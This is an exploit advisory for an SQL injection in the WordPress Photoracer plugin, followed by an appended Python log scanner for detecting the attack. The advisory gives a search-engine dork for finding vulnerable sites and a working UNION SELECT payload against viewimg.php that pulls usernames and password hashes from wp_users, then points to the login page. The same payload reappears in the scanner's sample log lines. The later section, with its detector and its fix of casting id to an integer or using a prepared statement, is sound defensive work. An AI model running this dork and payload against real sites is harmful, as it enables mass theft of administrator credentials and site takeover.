The WordPress Photoracer plugin suffers from a remote SQL injection vulnerability.
e238b5dfa28b995624eb2466abfaedf86b0435096a5ffb9260a569dfdba44e81
============================================================
WordPress v1.0 plugin photoracer SQL Injection Vulnerability
============================================================
#######################################################
# IN THE NAME OF GOD
#
# WORDPRESS v1.0 SQL Injection Vulnerability
#
# Author : HELLBOY
#
# Tested on : Linux
#
# DATE : 2010-06-14
#
# Email : A68_HELLBOY@yahooL.COM
#
# Dork : inurl:"wp-content/plugins/photoracer/viewimg.php?id="
#
########################################################
# Exploit :
# http://[site]/wp-content/plugins/photoracer/viewimg.php?id={SQLI}
#
# EXAM: http://[site]/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
#
# PAGE LOGIN : http://[site]/wp-login.php
#
#########################################################
# Greetz :
# All members of the Forum WwW.security7.ir
#
#########################################################
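
For detection, the request pattern in this advisory can be hunted in web server access logs. The following is an added example, not part of the original advisory or the plugin's code: it assumes combined-format access logs and that a legitimate `id` is always a plain integer; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path of the script named in the advisory.
TARGET = "/wp-content/plugins/photoracer/viewimg.php"
# Client IP, request target and status from a combined-format log line (assumed format).
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def suspicious_id(value):
    """Assumption: a legitimate image id is a short run of ASCII digits; flag anything else."""
    return re.fullmatch(r"[0-9]{1,10}", value) is None

def scan(lines):
    """Return (client_ip, status, decoded_id) for each flagged request to viewimg.php."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target, status = m.groups()
        url = urlsplit(target)
        # endswith() also covers WordPress installed in a subdirectory.
        if not url.path.lower().endswith(TARGET):
            continue
        # parse_qs percent-decodes values and maps '+' to space, so encoded
        # variants of the same request are normalised before the check.
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get("id", []):
            if suspicious_id(value):
                hits.append((ip, int(status), value))
    return hits

# Constructed sample lines using documentation IP ranges, not real traffic.
SAMPLE = [
    '198.51.100.7 - - [14/Jun/2010:10:01:02 +0000] "GET /wp-content/plugins/photoracer/viewimg.php?id=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [14/Jun/2010:10:05:40 +0000] "GET /wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3 HTTP/1.1" 200 734',
    '203.0.113.9 - - [14/Jun/2010:10:05:44 +0000] "GET /blog/wp-content/plugins/photoracer/viewimg.php?id=%2D1+union+select+1,2,3 HTTP/1.1" 200 734',
    '198.51.100.7 - - [14/Jun/2010:10:06:00 +0000] "GET /index.php?id=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, status, value in scan(SAMPLE):
        print(f"{ip} status={status} id={value!r}")
```

The same integer-only rule is the server-side fix: cast `id` to an integer or bind it through a prepared statement before it reaches the query.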